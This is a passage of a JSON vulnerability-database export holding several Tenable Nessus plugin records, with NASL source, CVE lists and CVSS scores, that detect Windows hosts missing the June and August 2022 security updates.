or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016616'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nvar os_name = get_kb_item(\"SMB/ProductName\");\n\nif ( ( (\"enterprise\" >< tolower(os_name) || \"education\" >< tolower(os_name))\n &&\n smb_check_rollup(os:'10',\n os_build:19042,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016616]) \n )\n ||\n smb_check_rollup(os:'10',\n os_build:19043,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016616])\n || \n smb_check_rollup(os:'10',\n os_build:19044,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016616])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:27:16", "description": "The remote Windows host is missing security update 5016627. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows WebBrowser Control Remote Code Execution Vulnerability (CVE-2022-30194)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016627: Windows Server 2022 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30194", "CVE-2022-30197", "CVE-2022-33670", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34699", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34705", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34712", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-34715", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35757", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35761", "CVE-2022-35762", "CVE-2022-35763", "CVE-2022-35764", "CVE-2022-35765", "CVE-2022-35766", "CVE-2022-35767", "CVE-2022-35768", 
"CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35792", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35795", "CVE-2022-35820"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016627.NASL", "href": "https://www.tenable.com/plugins/nessus/163953", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163953);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30194\",\n \"CVE-2022-30197\",\n \"CVE-2022-33670\",\n \"CVE-2022-34301\",\n \"CVE-2022-34302\",\n \"CVE-2022-34303\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34696\",\n \"CVE-2022-34699\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34703\",\n \"CVE-2022-34704\",\n \"CVE-2022-34705\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34709\",\n \"CVE-2022-34710\",\n \"CVE-2022-34712\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-34715\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35748\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35755\",\n \"CVE-2022-35756\",\n \"CVE-2022-35757\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35761\",\n \"CVE-2022-35762\",\n \"CVE-2022-35763\",\n \"CVE-2022-35764\",\n \"CVE-2022-35765\",\n \"CVE-2022-35766\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35771\",\n \"CVE-2022-35792\",\n \"CVE-2022-35793\",\n \"CVE-2022-35794\",\n \"CVE-2022-35795\",\n \"CVE-2022-35820\"\n );\n 
script_xref(name:\"MSKB\", value:\"5016627\");\n script_xref(name:\"MSFT\", value:\"MS22-5016627\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016627: Windows Server 2022 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016627. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows WebBrowser Control Remote Code Execution Vulnerability (CVE-2022-30194)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016627\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016627\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016627\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-34715\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016627'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:20348,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016627])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n 
hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-16T17:49:08", "description": "The remote Windows host is missing security update 5014710. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139, CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\n - Kerberos AppContainer Security Feature Bypass Vulnerability (CVE-2022-30164)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014710: Windows 10 LTS 1507 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", 
"CVE-2022-21166", "CVE-2022-30139", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30149", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014710.NASL", "href": "https://www.tenable.com/plugins/nessus/162206", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162206);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30139\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30149\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30162\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014710\");\n script_xref(name:\"MSFT\", value:\"MS22-5014710\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014710: Windows 10 LTS 1507 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple 
vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014710. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139,\n CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\n - Kerberos AppContainer Security Feature Bypass Vulnerability (CVE-2022-30164)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014710\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014710\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30190\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30161\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014710'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:10240,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014710])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n 
audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-16T17:48:16", "description": "The remote Windows host is missing security update 5014678. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139, CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014678: Windows Server 2022 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30132", "CVE-2022-30139", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30143", "CVE-2022-30145", 
"CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30149", "CVE-2022-30150", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30154", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30165", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014678.NASL", "href": "https://www.tenable.com/plugins/nessus/162205", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162205);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-30132\",\n \"CVE-2022-30139\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30143\",\n \"CVE-2022-30145\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30149\",\n \"CVE-2022-30150\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30154\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30162\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30165\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014678\");\n script_xref(name:\"MSKB\", value:\"5014677\");\n script_xref(name:\"MSFT\", value:\"MS22-5014678\");\n script_xref(name:\"MSFT\", value:\"MS22-5014677\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014678: Windows Server 2022 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", 
value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014678. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139,\n CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014678\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014678\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30190\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30165\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014678',\n '5014677'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:20348,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014678, 5014677])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n 
hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-13T18:51:10", "description": "The remote Windows host is missing security update 5014746. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014746: Windows Server 2012 R2 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", 
